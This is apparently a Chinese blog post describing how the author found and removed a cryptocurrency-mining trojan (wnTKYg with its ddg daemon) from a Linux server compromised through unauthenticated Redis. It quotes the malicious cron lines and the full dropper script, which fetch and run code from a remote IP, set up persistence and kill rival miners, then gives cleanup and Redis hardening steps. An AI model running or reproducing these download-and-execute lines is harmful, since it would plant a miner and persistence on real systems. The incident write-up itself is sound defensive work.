清除木马会删除文件吗,木马文件删不掉怎么办

首页 > 健康 > 作者:YD1662022-12-18 00:17:24

比特币涨的这么疯狂,其他各种币都跟着涨,各色的挖矿木马也是层出不穷,这不遇到了一个。来看看如何处理它。

在一次检查任务计划时发现两个自己未曾添加的任务

#crontab -l */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

觉得奇怪,删除任务计划,删除/var/spool/cron/crontabs/root里的内容,当我查看占用CPU资源进程发现有个wnTKYg进程很占资源,搜索发现是挖矿木马,挖挖挖…哇哇哇,有网友说wnTKYg是门罗币,待验证。
i.sh脚本内容如下:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.2020" ]; then curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020 fi if [ ! -f "/tmp/ddg.2020" ]; then wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020 fi chmod x /tmp/ddg.2020 && /tmp/ddg.2020 #这家伙还挺奸的,把其他挖矿的木马给干了先,保证自己的挖矿木马充分利用资源,最大限度榨取肉鸡资源 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

发现木马那就得除掉它,先是ps -ef |grep “wnTKYg”,找出进程好,再pkill清除进程,再find / -name wnTKYg*查找文件,找到/tmp/wnTKYg,于是删除。以为大功告成,清除木马了,没想到,几分钟后又有wnTKYg进程出现,看来是有什么监控着状态,停止了就又启动。详细查看百度出来的文章,原来还有其他地方有任务计划在执行。 按网友的方法一一铲除。

1、清除服务器上的公钥配置,查看用户列表,删除表中陌生的帐号,先把熊孩子挡在门外,不能让他们再进来了。
查看/root/.SSH下的文件known_hosts,发现有不认识的IP,查看完直接清除.ssh下的文件,简单省事。

#rm -rf /root/.ssh/* #cat /etc/passwd #userdel 对应的用户名

2、清除任务计划,不然*掉的进程又重新运行了。

#crontab -e 删除下面两条任务计划 */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

查看/var/spool/cron目录下的任务计划,删除相关计划

3、清除对应进程及文件

#ps aux |grep "wnTKYg*" #pkill -9 进程号 删除这个后没多久就有启动了,看来有个守护进程,top继续查看进程,终于发现有一个/tmp/ddg.2020进程可疑,百度一下果然就是挖矿工的守护进程。 #ps aux |grep "ddg*" #pkill -9 进程号 接下来吧运行文件删除 #find / -name wnTKYg* #find / -name ddg* wnTKYg和ddg都是在/tmp下,只有/tmp下有这两文件,删了 #rm -rf wnTKYg #rm -rf ddg.2020

4、修复Redis的后门的缺陷
Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生,严重危害业务正常服务。
一旦入侵成功,Redis数据会丢失,攻击者可直接添加账号用于ssh远程登录控制服务器,会给用户的 Redis 运行环境以及 Linux 主机造成安全风险,引发重要数据删除、泄露或加密勒索事件发生。
入侵条件:redis服务对公网开放,且未启用认证。

a.在 redis.conf 文件中找到 “# bind 127.0.0.1” ,把前面的#号去掉,然后保存。注:修改后只有本机才能访问Redis,也可以指定访问源IP访问Redis,最好也更改服务端口,不使用默认端口。
# port 6379
# bind 192.168.1.100 10.0.0.1

b.设置访问密码 (需要重启redis才能生效)在 redis.conf 中找到“requirepass”字段,在后面填上你需要的密码,Redis客户端也需要使用此密码来访问Redis服务。
#requirepass !QE%^E3323BDWEwwwe1839

c.设置防火墙策略如果正常业务中Redis服务需要被其他服务器来访问,可以设置iptables策略仅允许指定的IP来访问Redis服务。
iptables -A INPUT -s x.x.x.x -p tcp –dport 6379 -j ACCEPT

d.修改Redis服务运行账号 (需要重启redis才能生效)请以较低权限账号运行Redis服务,并禁用该账号的登录权限。以下为创建一个无home目录和无法登陆的普通权限账号:
#useradd -M -s /sbin/nologin [username]

栏目热文

文档排行

本站推荐

Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.